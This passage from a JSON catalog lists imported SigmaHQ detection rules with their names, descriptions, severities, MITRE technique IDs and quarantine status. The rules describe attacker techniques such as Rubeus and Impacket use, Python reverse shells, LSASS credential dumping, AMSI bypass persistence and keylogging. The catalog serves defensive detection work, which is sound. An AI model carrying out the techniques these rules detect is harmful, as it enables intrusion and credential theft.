"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_access_policy_deleted.yml" } }, { "id": "sigmahq-sigma-3245cd30-e015-40ff-a31d-5cadd5f377ec", "type": "detection", "name": "HackTool - Rubeus Execution - ScriptBlock", "description": "Detects the execution of the hacktool Rubeus using specific command line flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-rubeus-execution-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" } }, { "id": "sigmahq-sigma-3268b746-88d8-4cd3-bffc-30077d02c787", "type": "detection", "name": "HackTool - Empire PowerShell UAC Bypass", "description": "Detects some Empire PowerShell UAC bypass methods", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-empire-powershell-uac-bypass.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3268b746-88d8-4cd3-bffc-30077d02c787", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" } }, { "id": "sigmahq-sigma-327f48c1-a6db-4eb8-875a-f6981f1b0183", "type": "detection", "name": "Port Forwarding Activity Via SSH.EXE", "description": "Detects port forwarding activity via SSH.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/port-forwarding-activity-via-ssh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml" } }, { "id": "sigmahq-sigma-327ff235-94eb-4f06-b9de-aaee571324be", "type": "detection", "name": "Regsvr32 Execution From Highly Suspicious Location", "description": "Detects execution of regsvr32 where the DLL is located in a highly suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-execution-from-highly-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "327ff235-94eb-4f06-b9de-aaee571324be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml" } }, { "id": "sigmahq-sigma-32b96012-7892-429e-b26c-ac2bf46066ff", "type": "detection", "name": "Shell32 DLL Execution in Suspicious Directory", "description": "Detects shell32.dll executing a DLL in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell32-dll-execution-in-suspicious-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32b96012-7892-429e-b26c-ac2bf46066ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml" } }, { "id": "sigmahq-sigma-32d56ea1-417f-44ff-822b-882873f5f43b", "type": "detection", "name": "Impacket PsExec Execution", "description": "Detects execution of Impacket's psexec.py.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/impacket-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32d56ea1-417f-44ff-822b-882873f5f43b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_impacket_psexec.yml" } }, { "id": "sigmahq-sigma-32e19d25-4aed-4860-a55a-be99cb0bf7ed", "type": "detection", "name": "Possible DC Shadow Attack", "description": "Detects DCShadow via create new SPN", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-dc-shadow-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_possible_dc_shadow.yml" } }, { "id": "sigmahq-sigma-32e280f1-8ad4-46ef-9e80-910657611fbc", "type": "detection", "name": "Potential Homoglyph Attack Using Lookalike Characters", "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-homoglyph-attack-using-lookalike-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e280f1-8ad4-46ef-9e80-910657611fbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml" } }, { "id": "sigmahq-sigma-32e62bc7-3de0-4bb1-90af-532978fe42c0", "type": "detection", "name": "Python Reverse Shell Execution Via PTY And Socket Modules", "description": "Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-reverse-shell-execution-via-pty-and-socket-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e62bc7-3de0-4bb1-90af-532978fe42c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml" } }, { "id": "sigmahq-sigma-33339be3-148b-4e16-af56-ad16ec6c7e7b", "type": "detection", "name": "Findstr Launching .lnk File", "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1202", "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/findstr-launching-lnk-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_lnk.yml" } }, { "id": "sigmahq-sigma-333cdbe8-27bb-4246-bf82-b41a0dca4b70", "type": "detection", "name": "Suspicious Volume Shadow Copy VSS_PS.dll Load", "description": "Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.\nIt is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.\nThe fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-volume-shadow-copy-vss-ps-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" } }, { "id": "sigmahq-sigma-3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "type": "detection", "name": "Sysinternals PsService Execution", "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-psservice-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" } }, { "id": "sigmahq-sigma-3390fbef-c98d-4bdd-a863-d65ed7c610dd", "type": "detection", "name": "New ODBC Driver Registered", "description": "Detects the registration of a new ODBC driver.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-odbc-driver-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3390fbef-c98d-4bdd-a863-d65ed7c610dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml" } }, { "id": "sigmahq-sigma-33be4333-2c6b-44f4-ae28-102cdbde0a31", "type": "detection", "name": "Suspicious Msbuild Execution By Uncommon Parent Process", "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msbuild-execution-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml" } }, { "id": "sigmahq-sigma-33d50d03-20ec-4b74-a74e-1e65a38af1c0", "type": "detection", "name": "AWS EKS Cluster Created or Deleted", "description": "Identifies when an EKS cluster is created or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-eks-cluster-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-33e814e0-1f00-4e43-9c34-31fb7ae2b174", "type": "detection", "name": "ESXi Network Configuration Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-network-configuration-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33e814e0-1f00-4e43-9c34-31fb7ae2b174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" } }, { "id": "sigmahq-sigma-33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "type": "detection", "name": "Potential Persistence Via New AMSI Providers - Registry", "description": "Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.\nAttackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.\nThis technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-new-amsi-providers-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml" } }, { "id": "sigmahq-sigma-33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "type": "detection", "name": "Lsass Full Dump Request Via DumpType Registry Settings", "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-full-dump-request-via-dumptype-registry-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" } }, { "id": "sigmahq-sigma-33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "type": "detection", "name": "WMI Persistence - Script Event Consumer File Write", "description": "Detects file writes of WMI script event consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-script-event-consumer-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" } }, { "id": "sigmahq-sigma-340a090b-c4e9-412e-bb36-b4b16fe96f9b", "type": "detection", "name": "Renamed ZOHO Dctask64 Execution", "description": "Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1055.001", "T1202", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-zoho-dctask64-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" } }, { "id": "sigmahq-sigma-340ee172-4b67-4fb4-832f-f961bdc1f3aa", "type": "detection", "name": "Password Reset By User Account", "description": "Detect when a user has reset their password in Azure AD", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-reset-by-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_user_password_change.yml" } }, { "id": "sigmahq-sigma-34275eb8-fa19-436b-b959-3d9ecd53fa1f", "type": "detection", "name": "Loaded Module Enumeration Via Tasklist.EXE", "description": "Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\nThis is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.\nIn order to dump the process memory or perform other nefarious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loaded-module-enumeration-via-tasklist-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34275eb8-fa19-436b-b959-3d9ecd53fa1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml" } }, { "id": "sigmahq-sigma-34746e8c-5fb8-415a-b135-0abc167e912a", "type": "detection", "name": "WinSxS Executable File Creation By Non-System Process", "description": "Detects the creation of binaries in the WinSxS folder by non-system processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winsxs-executable-file-creation-by-non-system-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34746e8c-5fb8-415a-b135-0abc167e912a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml" } }, { "id": "sigmahq-sigma-347906f3-e207-4d18-ae5b-a9403d6bcdef", "type": "detection", "name": "Netsh Allow Group Policy on Microsoft Defender Firewall", "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netsh-allow-group-policy-on-microsoft-defender-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" } }, { "id": "sigmahq-sigma-34979410-e4b5-4e5d-8cfb-389fdff05c12", "type": "detection", "name": "Remove Immutable File Attribute", "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-immutable-file-attribute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" } }, { "id": "sigmahq-sigma-34986307-b7f4-49be-92f3-e7a4d01ac5db", "type": "detection", "name": "Rclone Config File Creation", "description": "Detects Rclone config files being created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rclone-config-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_rclone_config_files.yml" } }, { "id": "sigmahq-sigma-34aa0252-6039-40ff-951f-939fd6ce47d8", "type": "detection", "name": "Suspicious Keyboard Layout Load", "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-keyboard-layout-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34aa0252-6039-40ff-951f-939fd6ce47d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" } }, { "id": "sigmahq-sigma-34d81081-03c9-4a7f-91c9-5e46af625cde", "type": "detection", "name": "Bitbucket Unauthorized Full Data Export Triggered", "description": "Detects when full data export is attempted an unauthorized user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1213.003", "T1586" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-unauthorized-full-data-export-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34d81081-03c9-4a7f-91c9-5e46af625cde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml" } }, { "id": "sigmahq-sigma-34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "type": "detection", "name": "Outdated Dependency Or Vulnerability Alert Disabled", "description": "Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\nThis rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outdated-dependency-or-vulnerability-alert-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml" } }, { "id": "sigmahq-sigma-34ebb878-1b15-4895-b352-ca2eeb99b274", "type": "detection", "name": "Suspicious Execution of Shutdown", "description": "Use of the commandline to shutdown or reboot windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34ebb878-1b15-4895-b352-ca2eeb99b274", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" } }, { "id": "sigmahq-sigma-34f90d3c-c297-49e9-b26d-911b05a4866c", "type": "detection", "name": "Powershell Keylogging", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 